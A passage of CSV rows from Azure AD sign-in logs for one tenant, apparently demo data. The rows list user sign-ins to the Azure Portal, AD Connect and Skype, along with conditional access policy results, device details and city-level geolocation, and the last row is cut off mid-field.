+1797,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,14:17.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 01:14,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5ef5316a-deee-4f03-8fd7-4abf716c0000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5ef5316a-deee-4f03-8fd7-4abf716c0000,SigninLogs,Sucess,33.0175209,35.44601059
+1798,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:59.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,82d3b87b-6e50-48c3-bbd8-98223c536db2,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 00:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",aa9828f4-3e2d-42fa-acbc-edb9dc290100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,aa9828f4-3e2d-42fa-acbc-edb9dc290100,SigninLogs,Sucess,36.6404686,-78.26995087
+1799,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:53.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,185ab5c3-fafd-4e10-95d4-531c1c384f91,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 01:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",f05c8354-7e46-4145-8055-7056b3000200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,f05c8354-7e46-4145-8055-7056b3000200,SigninLogs,Sucess,36.6404686,-78.26995087
+1800,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:54.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 12:28,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",c1903f77-ceca-4811-8084-8940dbfc0e00,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,c1903f77-ceca-4811-8084-8940dbfc0e00,SigninLogs,Sucess,51.4458313,-0.969720006
+1801,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:32.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,67233b04-c3f6-44e5-aa30-2ab27c364bea,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 11:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",5fa972fe-7fa8-4b4b-bbdd-e602dbdc1100,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,5fa972fe-7fa8-4b4b-bbdd-e602dbdc1100,SigninLogs,Sucess,50.6406517,5.572050095
+1802,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:59.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,19a7b510-f8d8-4f39-9dec-c9e5d06c323f,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 01:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",e9cfabe1-d666-446f-aeb7-5817966b0100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e9cfabe1-d666-446f-aeb7-5817966b0100,SigninLogs,Sucess,36.6404686,-78.26995087
+1803,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,14:20.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 02:14,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",cbcd7f19-25f4-4cfd-824c-94dcc3d10000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,cbcd7f19-25f4-4cfd-824c-94dcc3d10000,SigninLogs,Sucess,33.0175209,35.44601059
+1804,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:22.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,50387ab0-0d8c-41d1-9751-c1147c02f094,Microsoft.aadiam,Microsoft.aadiam,,Sri Laxmi Sangabathula,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 01:03,"{'operatingSystem': 'Windows 10', 'deviceId': '1aec47a5-7dee-4fd4-be7f-5e85deea66b1', 'browser': 'Chrome 80.0.3987', 'displayName': 'SRISANG', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 